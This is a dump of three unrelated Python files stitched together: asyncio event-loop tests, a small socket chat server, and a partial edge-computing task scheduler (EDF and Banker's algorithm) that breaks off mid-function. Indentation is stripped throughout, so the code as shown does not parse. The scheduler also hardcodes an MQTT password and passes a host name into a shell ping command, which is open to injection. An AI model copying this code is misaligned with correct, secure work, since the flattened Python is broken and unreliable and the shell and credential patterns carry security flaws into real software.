self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
__name__ = 'AAA'
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
if __name__ == '__main__':
unittest.main()
|
server.py
|
import sys
import socket
import atexit
import threading
HOST = "127.0.0.1"
PORT = 23333
MAX_CONNECTIONS = 8
MAX_BUFFER_SIZE = 2048
ENCODING = "utf-8"
if len(sys.argv) > 2:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
# str:connection
user = {}
# reg {name}
# send {name} {message}
# exit
def quit():
    # close the listening socket when the server process exits
    global s
    s.close()
atexit.register(quit)
def send(conn, message):
conn.sendall(message.encode(ENCODING))
def serve(conn, addr):
global user
name = "Unknown Guest"
while True:
buf = conn.recv(MAX_BUFFER_SIZE)
if not buf:  # client closed the connection without sending "exit"
    break
command = buf.decode(ENCODING).strip()
print("(info) Message from %s:%s: %s" % (addr[0], addr[1], command.strip()))
parameters = command.split(" ")
token = parameters[0].lower()
if token == "reg":
user[parameters[1]] = conn
name = parameters[1]
print("(info) Register new user: %s" % name)
elif token == "send":
send(user[parameters[1]], " ".join(parameters[2:]))
elif token == "exit":
conn.close()
user.pop(name)
print("(warn) %s left the server" % name)
return None
s.listen(MAX_CONNECTIONS)
while True:
conn, addr = s.accept()
print("(info) New connection from %s:%s" % addr)
t = threading.Thread(target=serve, args=(conn, addr))
t.start()
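# Example session (hypothetical, using the defaults above; e.g. two clients
# connected with `nc 127.0.0.1 23333`):
#   client A sends:  reg alice
#   client B sends:  reg bob
#   client A sends:  send bob hello there    -> server forwards "hello there" to bob
#   client A sends:  exit                    -> server closes alice's connection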
|
algo_two.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
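# Notes on the structures above (as used by the scheduler below):
# - _tasks: per-task wcet (worst-case execution time), period and deadline,
#   all in the same abstract time units.
# - _need / allocation: per-task resource vectors in the order given by the
#   'mat' comment above, i.e. [cpu, mem, storage]; they feed the
#   Banker's-style safety check in is_safe().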
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {task: wait_time}] => records tasks re-offloaded to this MEC for execution
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
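# ping() shells out to `ping -c 1 <host>` and parses the first field of the
# rtt summary line ("rtt min/avg/max/mdev = ..."), so it returns the
# round-trip time in milliseconds, or None if parsing fails.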
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
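# The hyperperiod used by edf() is the LCM of all task periods; e.g. with the
# periods defined in _tasks above, lcm([20, 5, 10, 10, 15]) == 60.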
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
# else:
# print('data: ', data)
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
total_received_task = 0
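# edf() builds the ready queue over one hyperperiod (LCM of the periods),
# releases each job with an absolute deadline, sorts jobs by deadline and
# simulates execution; jobs that cannot meet their deadline are handed to
# cooperative_mec() for offloading, and the schedule is expanded into a
# per-time-slot sequence by task_time_map().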
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
# print('s : ', schedule)
# print('r: ', register)
if len(missed) > 0:
# print('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
# generate execution sequence
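# is_safe() runs a Banker's-algorithm safety check over the candidate
# processes; when no safe sequence can be completed it picks the process with
# the largest allocation, offloads it via cooperative_mec(), frees its
# resources and continues, counting the event in deadlock[0].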
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check whether, for every resource, the remaining
# need of the current process fits within work[]
satisfied = all(need[t][j] <= work[j] for j in range(res))
# If all needs of p were satisfied.
if satisfied:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
